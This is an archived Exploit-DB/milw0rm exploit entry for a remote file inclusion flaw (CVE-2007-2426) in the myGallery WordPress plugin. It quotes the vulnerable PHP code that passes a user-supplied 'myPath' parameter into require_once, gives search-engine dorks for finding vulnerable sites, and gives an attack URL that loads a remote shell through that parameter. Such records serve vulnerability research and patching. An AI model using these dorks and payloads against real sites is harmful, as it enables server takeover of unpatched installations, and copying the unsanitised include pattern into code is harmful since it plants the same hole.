WordPress Plugin mygallery 1.4b4 - Remote File Inclusion
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-04-28
date_updated: 2016-09-30
verified: 1
codes: OSVDB-34356;CVE-2007-2426
tags: WordPress Plugin
aliases:
screenshot_url:
application_url: http://www.exploit-db.commygallery_1.2.1.zip
AAAAAAAAA AAAAAAAA AAA AAA AAA AAAAAAAA
AAAAAAAAA AAAAAAAAA AAA AAA AAAAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAAAAAA AAA
AAA AAAAAAAAA AAAAA AAA AAA AAA AAAAA
AAA AAAAAAAA AAA AAA AAA AAA AAAAA
AAA AAA AAA AAA AAAAAAAAA AAA AAA
AAA AAA AAA AAA AAA AAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAA AAAAAAAA
# myGallery 1.2.1(myPath)Remote File Include Vulnerablity
# Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code
#########################################################
# if (!$_POST){
# $mypath=$_GET['myPath']; <---------[+]
#
# }
# else {
# $mypath=$_POST['myPath'];<---------[+]
#
#
# }
# require_once($mypath.'/wp-config.php');<---------[+]
########################################################
# Dork :
# inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php
# Ex:
# [Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell
# Sp.Thanx = Tryag-Team
# milw0rm.com [2007-04-29]